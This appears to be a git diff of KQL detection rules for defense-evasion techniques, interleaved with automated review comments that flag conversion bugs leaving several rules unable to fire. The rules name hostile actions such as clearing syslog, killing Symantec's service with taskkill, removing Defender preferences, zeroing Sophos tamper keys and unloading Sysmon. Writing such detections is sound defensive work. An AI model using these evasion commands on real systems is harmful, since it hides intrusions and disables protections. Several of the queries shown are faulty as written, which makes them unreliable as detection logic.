-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1070.002
-// False Positives:
-// - Log rotation.
-// - Maintenance.
-
-DeviceProcessEvents
+// Title: Syslog Clearing or Removal Via System Utilities
+// Author: Max Altgelt (Nextron Systems), Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
+// Date: 2021-10-15
+// Level: high
+// Description: Detects specific commands commonly used to remove or empty the syslog. Which is a technique often used by attacker as a method to hide their tracks
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.002
+// False Positives:
+// - Log rotation.
+// - Maintenance.
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "/var/log/syslog" and ((ProcessCommandLine contains "/dev/null" and FolderPath endswith "/cp") or ((ProcessCommandLine contains "-sf " or ProcessCommandLine contains "-sfn " or ProcessCommandLine contains "-sfT ") and (ProcessCommandLine contains "/dev/null " and ProcessCommandLine contains "/var/log/syslog") and FolderPath endswith "/ln") or FolderPath endswith "/mv" or ((ProcessCommandLine contains " -r " or ProcessCommandLine contains " -f " or ProcessCommandLine contains " -rf " or ProcessCommandLine contains "/var/log/syslog") and FolderPath endswith "/rm") or (ProcessCommandLine contains "-u " and FolderPath endswith "/shred") or ((ProcessCommandLine contains "-s " or ProcessCommandLine contains "-c " or ProcessCommandLine contains "--size") and (ProcessCommandLine contains "0 " and ProcessCommandLine contains "/var/log/syslog") and FolderPath endswith "/truncate") or FolderPath endswith "/unlink")) or ((ProcessCommandLine contains "journalctl --vacuum" or ProcessCommandLine contains "journalctl --rotate") or (ProcessCommandLine contains " > /var/log/syslog" or ProcessCommandLine contains " >/var/log/syslog" or ProcessCommandLine contains " >| /var/log/syslog" or ProcessCommandLine contains ": > /var/log/syslog" or ProcessCommandLine contains ":> /var/log/syslog" or ProcessCommandLine contains ":>/var/log/syslog" or ProcessCommandLine contains ">|/var/log/syslog"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/sysmon_configuration_update.kql b/KQL/rules/Defense Evasion/sysmon_configuration_update.kql
index dc428207..d48c7077 100644
--- a/KQL/rules/Defense Evasion/sysmon_configuration_update.kql
+++ b/KQL/rules/Defense Evasion/sysmon_configuration_update.kql
@@ -1,12 +1,12 @@
-// Title: Sysmon Configuration Update
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-03-09
-// Level: medium
-// Description: Detects updates to Sysmon's configuration. Attackers might update or replace the Sysmon configuration with a bare bone one to avoid monitoring without shutting down the service completely
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.001
-// False Positives:
-// - Legitimate administrators might use this command to update Sysmon configuration.
-
-DeviceProcessEvents
+// Title: Sysmon Configuration Update
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-09
+// Level: medium
+// Description: Detects updates to Sysmon's configuration. Attackers might update or replace the Sysmon configuration with a bare bone one to avoid monitoring without shutting down the service completely
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Legitimate administrators might use this command to update Sysmon configuration.
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "-c" or ProcessCommandLine contains "/c" or ProcessCommandLine contains "–c" or ProcessCommandLine contains "—c" or ProcessCommandLine contains "―c") and ((FolderPath endswith "\\Sysmon64.exe" or FolderPath endswith "\\Sysmon.exe") or ProcessVersionInfoFileDescription =~ "System activity monitor")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/sysmon_driver_altitude_change.kql b/KQL/rules/Defense Evasion/sysmon_driver_altitude_change.kql
index f305d2d9..c645dd67 100644
--- a/KQL/rules/Defense Evasion/sysmon_driver_altitude_change.kql
+++ b/KQL/rules/Defense Evasion/sysmon_driver_altitude_change.kql
@@ -1,13 +1,13 @@
-// Title: Sysmon Driver Altitude Change
-// Author: B.Talebi
-// Date: 2022-07-28
-// Level: high
-// Description: Detects changes in Sysmon driver altitude value.
-// If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.001
-// False Positives:
-// - Legitimate driver altitude change to hide sysmon
-
-DeviceRegistryEvents
+// Title: Sysmon Driver Altitude Change
+// Author: B.Talebi
+// Date: 2022-07-28
+// Level: high
+// Description: Detects changes in Sysmon driver altitude value.
+// If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Legitimate driver altitude change to hide sysmon
+
+DeviceRegistryEvents
 | where RegistryKey endswith "\\Services*" and RegistryKey endswith "\\Instances\\Sysmon Instance\\Altitude"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/sysmon_driver_unloaded_via_fltmc_exe.kql b/KQL/rules/Defense Evasion/sysmon_driver_unloaded_via_fltmc_exe.kql
index 330c59d9..cbf2e305 100644
--- a/KQL/rules/Defense Evasion/sysmon_driver_unloaded_via_fltmc_exe.kql
+++ b/KQL/rules/Defense Evasion/sysmon_driver_unloaded_via_fltmc_exe.kql
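Review bot: The `| where` line of this rule can never be true: `RegistryKey endswith "\\Services*" and RegistryKey endswith "\\Instances\\Sysmon Instance\\Altitude"` requires one string to end with two different suffixes, and the `*` is a wildcard that survived conversion as a literal character, so the rule is silent in production. The first term should be a `contains "\\Services\\"` check, and since `Altitude` is a value name, which DeviceRegistryEvents exposes in RegistryValueName rather than at the end of RegistryKey (if I read the schema correctly), the condition should read `| where RegistryKey contains "\\Services\\" and RegistryKey endswith "\\Instances\\Sysmon Instance" and RegistryValueName =~ "Altitude"`. The same key-versus-value-name mapping affects the Sophos hunk below (tamper_with_sophos_av_registry_keys.kql), where SAVEnabled, SEDEnabled and Enabled are value names. The converter's handling of trailing wildcards in `endswith` is worth auditing across the other registry rules in this commit.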
@@ -1,12 +1,12 @@
-// Title: Sysmon Driver Unloaded Via Fltmc.EXE
-// Author: Kirill Kiryanov, oscd.community
-// Date: 2019-10-23
-// Level: high
-// Description: Detects possible Sysmon filter driver unloaded via fltmc.exe
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1070, attack.t1562, attack.t1562.002
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Sysmon Driver Unloaded Via Fltmc.EXE
+// Author: Kirill Kiryanov, oscd.community
+// Date: 2019-10-23
+// Level: high
+// Description: Detects possible Sysmon filter driver unloaded via fltmc.exe
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070, attack.t1562, attack.t1562.002
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "unload" and ProcessCommandLine contains "sysmon") and (FolderPath endswith "\\fltMC.exe" or ProcessVersionInfoOriginalFileName =~ "fltMC.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/system_control_panel_item_loaded_from_uncommon_location.kql b/KQL/rules/Defense Evasion/system_control_panel_item_loaded_from_uncommon_location.kql
index 7c808195..667c079f 100644
--- a/KQL/rules/Defense Evasion/system_control_panel_item_loaded_from_uncommon_location.kql
+++ b/KQL/rules/Defense Evasion/system_control_panel_item_loaded_from_uncommon_location.kql
@@ -1,10 +1,10 @@
-// Title: System Control Panel Item Loaded From Uncommon Location
-// Author: Anish Bogati
-// Date: 2024-01-09
-// Level: medium
-// Description: Detects image load events of system control panel items (.cpl) from uncommon or non-system locations which might be the result of sideloading.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1036
-
-DeviceImageLoadEvents
+// Title: System Control Panel Item Loaded From Uncommon Location
+// Author: Anish Bogati
+// Date: 2024-01-09
+// Level: medium
+// Description: Detects image load events of system control panel items (.cpl) from uncommon or non-system locations which might be the result of sideloading.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036
+
+DeviceImageLoadEvents
 | where (FolderPath endswith "\\hdwwiz.cpl" or FolderPath endswith "\\appwiz.cpl") and (not((FolderPath contains ":\\Windows\\System32\\" or FolderPath contains ":\\Windows\\SysWOW64\\" or FolderPath contains ":\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/system_file_execution_location_anomaly.kql b/KQL/rules/Defense Evasion/system_file_execution_location_anomaly.kql
index a581c612..ed35a173 100644
--- a/KQL/rules/Defense Evasion/system_file_execution_location_anomaly.kql
+++ b/KQL/rules/Defense Evasion/system_file_execution_location_anomaly.kql
@@ -1,10 +1,10 @@
-// Title: System File Execution Location Anomaly
-// Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2017-11-27
-// Level: high
-// Description: Detects the execution of a Windows system binary that is usually located in the system folder from an uncommon location.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1036
-
-DeviceProcessEvents
+// Title: System File Execution Location Anomaly
+// Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2017-11-27
+// Level: high
+// Description: Detects the execution of a Windows system binary that is usually located in the system folder from an uncommon location.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\atbroker.exe" or FolderPath endswith "\\audiodg.exe" or FolderPath endswith "\\bcdedit.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certreq.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\conhost.exe" or FolderPath endswith "\\consent.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\csrss.exe" or FolderPath endswith "\\dashost.exe" or FolderPath endswith "\\defrag.exe" or FolderPath endswith "\\dfrgui.exe" or FolderPath endswith "\\dism.exe" or FolderPath endswith "\\dllhost.exe" or FolderPath endswith "\\dllhst3g.exe" or FolderPath endswith "\\dwm.exe" or FolderPath endswith "\\eventvwr.exe" or FolderPath endswith "\\logonui.exe" or FolderPath endswith "\\LsaIso.exe" or FolderPath endswith "\\lsass.exe" or FolderPath endswith "\\lsm.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\ntoskrnl.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\runonce.exe" or FolderPath endswith "\\RuntimeBroker.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\services.exe" or FolderPath endswith "\\sihost.exe" or FolderPath endswith "\\smartscreen.exe" or FolderPath endswith "\\smss.exe" or FolderPath endswith "\\spoolsv.exe" or FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\taskhost.exe" or FolderPath endswith "\\taskhostw.exe" or FolderPath endswith "\\Taskmgr.exe" or FolderPath endswith "\\userinit.exe" or FolderPath endswith "\\wininit.exe" or FolderPath endswith "\\winlogon.exe" or FolderPath endswith "\\winver.exe" or FolderPath endswith "\\wlanext.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wsl.exe" or FolderPath endswith "\\wsmprovhost.exe") and (not(((FolderPath startswith "C:\\$WINDOWS.~BT\\" or FolderPath startswith "C:\\$WinREAgent\\" or FolderPath startswith "C:\\Windows\\SoftwareDistribution\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SystemTemp\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\uus\\" or FolderPath startswith "C:\\Windows\\WinSxS\\") or ((FolderPath contains "C:\\Program Files\\PowerShell\\7\\" or FolderPath contains "C:\\Program Files\\PowerShell\\7-preview\\" or FolderPath contains "C:\\Program Files\\WindowsApps\\Microsoft.PowerShellPreview" or FolderPath contains "\\AppData\\Local\\Microsoft\\WindowsApps\\Microsoft.PowerShellPreview") and FolderPath endswith "\\pwsh.exe") or (FolderPath contains "\\AppData\\Local\\Microsoft\\WindowsApps\\" and FolderPath endswith "\\wsl.exe" and FolderPath startswith "C:\\Users\\'") or (FolderPath endswith "\\wsl.exe" and (FolderPath startswith "C:\\Program Files\\WindowsApps\\MicrosoftCorporationII.WindowsSubsystemForLinux" or FolderPath startswith "C:\\Program Files\\WSL\\"))))) and (not(FolderPath contains "\\SystemRoot\\System32\\"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/system_information_discovery_via_sysctl_macos.kql b/KQL/rules/Defense Evasion/system_information_discovery_via_sysctl_macos.kql
index 10f3b51e..7419fa36 100644
--- a/KQL/rules/Defense Evasion/system_information_discovery_via_sysctl_macos.kql
+++ b/KQL/rules/Defense Evasion/system_information_discovery_via_sysctl_macos.kql
@@ -1,13 +1,13 @@
-// Title: System Information Discovery Via Sysctl - MacOS
-// Author: Pratinav Chandra
-// Date: 2024-05-27
-// Level: medium
-// Description: Detects the execution of "sysctl" with specific arguments that have been used by threat actors and malware. It provides system hardware information.
-// This process is primarily used to detect and avoid virtualization and analysis environments.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1497.001, attack.discovery, attack.t1082
-// False Positives:
-// - Legitimate administrative activities
-
-DeviceProcessEvents
+// Title: System Information Discovery Via Sysctl - MacOS
+// Author: Pratinav Chandra
+// Date: 2024-05-27
+// Level: medium
+// Description: Detects the execution of "sysctl" with specific arguments that have been used by threat actors and malware. It provides system hardware information.
+// This process is primarily used to detect and avoid virtualization and analysis environments.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1497.001, attack.discovery, attack.t1082
+// False Positives:
+// - Legitimate administrative activities
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "hw." or ProcessCommandLine contains "kern." or ProcessCommandLine contains "machdep.") and (FolderPath endswith "/sysctl" or ProcessCommandLine contains "sysctl")
\ No newline at end of file
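Review bot: The per-user WSL exclusion inside the `not(...)` block of system_file_execution_location_anomaly.kql reads `FolderPath startswith "C:\\Users\\'"` — the trailing `'` is a literal character in the KQL string, so this exclusion can never match and every wsl.exe started from a user's `\AppData\Local\Microsoft\WindowsApps\` path is reported as an anomaly; it looks like a quoting artifact from the conversion rather than intent. It should read `FolderPath startswith "C:\\Users\\"`. The rule's `| where` clause is one KQL line that this chunk shows wrapped across several physical lines.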
diff --git a/KQL/rules/Defense Evasion/tamper_windows_defender_remove_mppreference.kql b/KQL/rules/Defense Evasion/tamper_windows_defender_remove_mppreference.kql
index 4acb55af..b6835f6a 100644
--- a/KQL/rules/Defense Evasion/tamper_windows_defender_remove_mppreference.kql
+++ b/KQL/rules/Defense Evasion/tamper_windows_defender_remove_mppreference.kql
@@ -1,12 +1,12 @@
-// Title: Tamper Windows Defender Remove-MpPreference
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-08-05
-// Level: high
-// Description: Detects attempts to remove Windows Defender configurations using the 'MpPreference' cmdlet
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.001
-// False Positives:
-// - Legitimate PowerShell scripts
-
-DeviceProcessEvents
+// Title: Tamper Windows Defender Remove-MpPreference
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-05
+// Level: high
+// Description: Detects attempts to remove Windows Defender configurations using the 'MpPreference' cmdlet
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Legitimate PowerShell scripts
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "Remove-MpPreference" and (ProcessCommandLine contains "-ControlledFolderAccessProtectedFolders " or ProcessCommandLine contains "-AttackSurfaceReductionRules_Ids " or ProcessCommandLine contains "-AttackSurfaceReductionRules_Actions " or ProcessCommandLine contains "-CheckForSignaturesBeforeRunningScan ")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/tamper_with_sophos_av_registry_keys.kql b/KQL/rules/Defense Evasion/tamper_with_sophos_av_registry_keys.kql
index 29b78207..86bf9496 100644
--- a/KQL/rules/Defense Evasion/tamper_with_sophos_av_registry_keys.kql
+++ b/KQL/rules/Defense Evasion/tamper_with_sophos_av_registry_keys.kql
@@ -1,12 +1,12 @@
-// Title: Tamper With Sophos AV Registry Keys
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-09-02
-// Level: high
-// Description: Detects tamper attempts to sophos av functionality via registry key modification
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.001
-// False Positives:
-// - Some FP may occur when the feature is disabled by the AV itself, you should always investigate if the action was legitimate
-
-DeviceRegistryEvents
+// Title: Tamper With Sophos AV Registry Keys
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-02
+// Level: high
+// Description: Detects tamper attempts to sophos av functionality via registry key modification
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Some FP may occur when the feature is disabled by the AV itself, you should always investigate if the action was legitimate
+
+DeviceRegistryEvents
 | where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey contains "\\Sophos Endpoint Defense\\TamperProtection\\Config\\SAVEnabled" or RegistryKey contains "\\Sophos Endpoint Defense\\TamperProtection\\Config\\SEDEnabled" or RegistryKey contains "\\Sophos\\SAVService\\TamperProtection\\Enabled")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/taskkill_symantec_endpoint_protection.kql b/KQL/rules/Defense Evasion/taskkill_symantec_endpoint_protection.kql
index c495f662..6d768a6a 100644
--- a/KQL/rules/Defense Evasion/taskkill_symantec_endpoint_protection.kql
+++ b/KQL/rules/Defense Evasion/taskkill_symantec_endpoint_protection.kql
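Review bot: `RegistryValueData =~ "DWORD (0x00000000)"` on the `| where` line is Sysmon's textual rendering of a DWORD; DeviceRegistryEvents carries the raw data as a plain string (`0` for this case, if my reading of the schema is right), so the equality never holds and this high-severity rule is silent. Compare the raw value instead, `RegistryValueData == "0"`, and since SAVEnabled, SEDEnabled and Enabled are value names rather than key-path components, match them with `RegistryValueName in~ ("SAVEnabled", "SEDEnabled", "Enabled")` and shorten the three `RegistryKey contains` terms to end at `\\Config` and `\\TamperProtection`. Any other Sysmon-formatted `Details` literal the converter emitted into RegistryValueData in this commit will have the same problem.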
@@ -1,12 +1,12 @@
-// Title: Taskkill Symantec Endpoint Protection
-// Author: Ilya Krestinichev, Florian Roth (Nextron Systems)
-// Date: 2022-09-13
-// Level: high
-// Description: Detects one of the possible scenarios for disabling Symantec Endpoint Protection.
-// Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism.
-// As a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.001
-
-DeviceProcessEvents
+// Title: Taskkill Symantec Endpoint Protection
+// Author: Ilya Krestinichev, Florian Roth (Nextron Systems)
+// Date: 2022-09-13
+// Level: high
+// Description: Detects one of the possible scenarios for disabling Symantec Endpoint Protection.
+// Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism.
+// As a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "taskkill" and ProcessCommandLine contains " /F " and ProcessCommandLine contains " /IM " and ProcessCommandLine contains "ccSvcHst.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/taskmgr_as_local_system.kql b/KQL/rules/Defense Evasion/taskmgr_as_local_system.kql
index 748e26bb..983a3725 100644
--- a/KQL/rules/Defense Evasion/taskmgr_as_local_system.kql
+++ b/KQL/rules/Defense Evasion/taskmgr_as_local_system.kql
@@ -1,10 +1,10 @@
-// Title: Taskmgr as LOCAL_SYSTEM
-// Author: Florian Roth (Nextron Systems)
-// Date: 2018-03-18
-// Level: high
-// Description: Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1036
-
-DeviceProcessEvents
+// Title: Taskmgr as LOCAL_SYSTEM
+// Author: Florian Roth (Nextron Systems)
+// Date: 2018-03-18
+// Level: high
+// Description: Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036
+
+DeviceProcessEvents
 | where FolderPath endswith "\\taskmgr.exe" and (AccountName contains "AUTHORI" or AccountName contains "AUTORI")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/teamviewer_log_file_deleted.kql b/KQL/rules/Defense Evasion/teamviewer_log_file_deleted.kql
index 1a84fbe5..aebbe968 100644
--- a/KQL/rules/Defense Evasion/teamviewer_log_file_deleted.kql
+++ b/KQL/rules/Defense Evasion/teamviewer_log_file_deleted.kql
@@ -1,10 +1,10 @@
-// Title: TeamViewer Log File Deleted
-// Author: frack113
-// Date: 2022-01-16
-// Level: low
-// Description: Detects the deletion of the TeamViewer log files which may indicate an attempt to destroy forensic evidence
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1070.004
-
-DeviceFileEvents
+// Title: TeamViewer Log File Deleted
+// Author: frack113
+// Date: 2022-01-16
+// Level: low
+// Description: Detects the deletion of the TeamViewer log files which may indicate an attempt to destroy forensic evidence
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.004
+
+DeviceFileEvents
 | where (FolderPath contains "\\TeamViewer_" and FolderPath endswith ".log") and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\svchost.exe"))
\ No newline at end of file
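Review bot: `AccountName contains "AUTHORI" or AccountName contains "AUTORI"` on the `| where` line of taskmgr_as_local_system.kql tests the wrong column: in DeviceProcessEvents the SYSTEM account surfaces, as far as I know, as AccountName `system` with the `NT AUTHORITY` part in AccountDomain, so this rule never fires even though the Sigma source checks the full `DOMAIN\user` string. Either move the check to the domain column, `(AccountDomain contains "AUTHORI" or AccountDomain contains "AUTORI")`, or use the locale-independent `AccountSid == "S-1-5-18"`. The same User→AccountName mapping is likely to be wrong wherever the Sigma rule matched on a domain prefix, so the converter's field map deserves a look.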
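Review bot: The teamviewer_log_file_deleted.kql query selects every DeviceFileEvents row for a `TeamViewer_*.log` path rather than deletions, so, unless the svchost exclusion happens to cover them, ordinary log writes by TeamViewer itself will trigger a rule whose title and description promise a deletion detection. Add `and ActionType == "FileDeleted"` to the `| where` clause. The Tomcat hunk further down (tomcat_webserver_logs_deleted.kql) has the same gap: its DeviceFileEvents query carries no ActionType filter either.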
diff --git a/KQL/rules/Defense Evasion/third_party_software_dll_sideloading.kql b/KQL/rules/Defense Evasion/third_party_software_dll_sideloading.kql
index b8d52e0a..f9c3f0a9 100644
--- a/KQL/rules/Defense Evasion/third_party_software_dll_sideloading.kql
+++ b/KQL/rules/Defense Evasion/third_party_software_dll_sideloading.kql
@@ -1,10 +1,10 @@
-// Title: Third Party Software DLL Sideloading
-// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
-// Date: 2022-08-17
-// Level: medium
-// Description: Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc)
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
-
-DeviceImageLoadEvents
+// Title: Third Party Software DLL Sideloading
+// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
+// Date: 2022-08-17
+// Level: medium
+// Description: Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+
+DeviceImageLoadEvents
 | where (FolderPath endswith "\\commfunc.dll" and (not((FolderPath contains "\\AppData\\local\\Google\\Chrome\\Application\\" or (FolderPath startswith "C:\\Program Files\\Lenovo\\Communications Utility\\" or FolderPath startswith "C:\\Program Files (x86)\\Lenovo\\Communications Utility\\"))))) or (FolderPath endswith "\\tosbtkbd.dll" and (not((FolderPath startswith "C:\\Program Files\\Toshiba\\Bluetooth Toshiba Stack\\" or FolderPath startswith "C:\\Program Files (x86)\\Toshiba\\Bluetooth Toshiba Stack\\"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/time_travel_debugging_utility_usage.kql b/KQL/rules/Defense Evasion/time_travel_debugging_utility_usage.kql
index 4a6a02a3..5bf2459b 100644
--- a/KQL/rules/Defense Evasion/time_travel_debugging_utility_usage.kql
+++ b/KQL/rules/Defense Evasion/time_travel_debugging_utility_usage.kql
@@ -1,12 +1,12 @@
-// Title: Time Travel Debugging Utility Usage
-// Author: Ensar Şamil, @sblmsrsn, @oscd_initiative
-// Date: 2020-10-06
-// Level: high
-// Description: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.credential-access, attack.t1218, attack.t1003.001
-// False Positives:
-// - Legitimate usage by software developers/testers
-
-DeviceProcessEvents
+// Title: Time Travel Debugging Utility Usage
+// Author: Ensar Şamil, @sblmsrsn, @oscd_initiative
+// Date: 2020-10-06
+// Level: high
+// Description: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.credential-access, attack.t1218, attack.t1003.001
+// False Positives:
+// - Legitimate usage by software developers/testers
+
+DeviceProcessEvents
 | where InitiatingProcessFolderPath endswith "\\tttracer.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/time_travel_debugging_utility_usage_image.kql b/KQL/rules/Defense Evasion/time_travel_debugging_utility_usage_image.kql
index a16d7d8e..8320f98e 100644
--- a/KQL/rules/Defense Evasion/time_travel_debugging_utility_usage_image.kql
+++ b/KQL/rules/Defense Evasion/time_travel_debugging_utility_usage_image.kql
@@ -1,12 +1,12 @@
-// Title: Time Travel Debugging Utility Usage - Image
-// Author: Ensar Şamil, @sblmsrsn, @oscd_initiative
-// Date: 2020-10-06
-// Level: high
-// Description: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.credential-access, attack.t1218, attack.t1003.001
-// False Positives:
-// - Legitimate usage by software developers/testers
-
-DeviceImageLoadEvents
+// Title: Time Travel Debugging Utility Usage - Image
+// Author: Ensar Şamil, @sblmsrsn, @oscd_initiative
+// Date: 2020-10-06
+// Level: high
+// Description: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.credential-access, attack.t1218, attack.t1003.001
+// False Positives:
+// - Legitimate usage by software developers/testers
+
+DeviceImageLoadEvents
 | where FolderPath endswith "\\ttdrecord.dll" or FolderPath endswith "\\ttdwriter.dll" or FolderPath endswith "\\ttdloader.dll"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/tomcat_webserver_logs_deleted.kql b/KQL/rules/Defense Evasion/tomcat_webserver_logs_deleted.kql
index 43170943..f6845c88 100644
--- a/KQL/rules/Defense Evasion/tomcat_webserver_logs_deleted.kql
+++ b/KQL/rules/Defense Evasion/tomcat_webserver_logs_deleted.kql
@@ -1,13 +1,13 @@
-// Title: Tomcat WebServer Logs Deleted
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-02-16
-// Level: medium
-// Description: Detects the deletion of tomcat WebServer logs which may indicate an attempt to destroy forensic evidence
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1070
-// False Positives:
-// - During uninstallation of the tomcat server
-// - During log rotation
-
-DeviceFileEvents
+// Title: Tomcat WebServer Logs Deleted
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-16
+// Level: medium
+// Description: Detects the deletion of tomcat WebServer logs which may indicate an attempt to destroy forensic evidence
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070
+// False Positives:
+// - During uninstallation of the tomcat server
+// - During log rotation
+
+DeviceFileEvents
 | where (FolderPath contains "catalina." or FolderPath contains "_access_log." or FolderPath contains "localhost.") and (FolderPath contains "\\Tomcat" and FolderPath contains "\\logs\\")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/touch_suspicious_service_file.kql b/KQL/rules/Defense Evasion/touch_suspicious_service_file.kql
index 4400edb6..3ae7800a 100644
--- a/KQL/rules/Defense Evasion/touch_suspicious_service_file.kql
+++ b/KQL/rules/Defense Evasion/touch_suspicious_service_file.kql
@@ -1,12 +1,12 @@
-// Title: Touch Suspicious Service File
-// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
-// Date: 2023-01-11
-// Level: medium
-// Description: Detects usage of the "touch" process in service file.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1070.006
-// False Positives:
-// - Admin changing date of files.
-
-DeviceProcessEvents
+// Title: Touch Suspicious Service File
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-01-11
+// Level: medium
+// Description: Detects usage of the "touch" process in service file.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.006
+// False Positives:
